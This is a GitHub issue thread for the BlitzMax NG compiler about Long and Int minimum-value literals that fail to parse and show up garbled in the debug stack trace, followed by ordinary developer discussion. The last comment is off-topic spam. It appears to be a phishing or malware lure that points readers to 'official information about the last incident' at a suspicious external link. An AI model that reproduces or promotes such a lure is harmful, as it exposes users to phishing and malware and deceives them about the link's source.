### ISSUE TITLE
Numeric literals with many digits won't compile

### ISSUE THREAD

**Issue by HurryStarfish** [bmx-ng/bcc#213]
`Const LONG_MINVALUE:Long   = -9223372036854775808:Long`
> Expecting expression but encountered ':'

This only seems to happen with larger-than-Int-sized literals.

**Comment by HurryStarfish** [comment]
Despite compiling and running properly now, when followed by a DebugStop,
```
Local LONG_MINVALUE:Long = -9223372036854775808:Long
Local INT_MINVALUE:Int = -2147483648:Int
```
show up as "-'..--).0-*(+,))+(0(" and "-./,),(-*,(" respectively in the stack trace. Speaking of which, I've just noticed that Consts and Globals don't seem to show up there at all. Should this be opened as a new issue perhaps?

**Comment by woollybah** [comment]
I don't think globals or consts show up with the legacy compiler in debug either.

**Comment by woollybah** [comment]
I should point out that the output you see is also true for the legacy compiler. I will endeavour to fix it in NG though ;-)

**Comment by HurryStarfish** [comment]
Both of the above are not true, at least for the version I am using (1.41 according to MaxGUI, which I just realized is a bit on the old side, but eh...)
http://puu.sh/pSeK9.png

**Comment by GWRon** [comment]
Happens with most current vanilla too.

Am 6. Juli 2016 15:04:05 MESZ, schrieb HurryStarfish <notifications@github.com>:

**Comment by Bobysait** [comment]
Greetings! 


Have  you read the official information about the last incident? You  may  find it  here  <http://nastiltesha.zepfel.com/e6zbeme>

bybysait
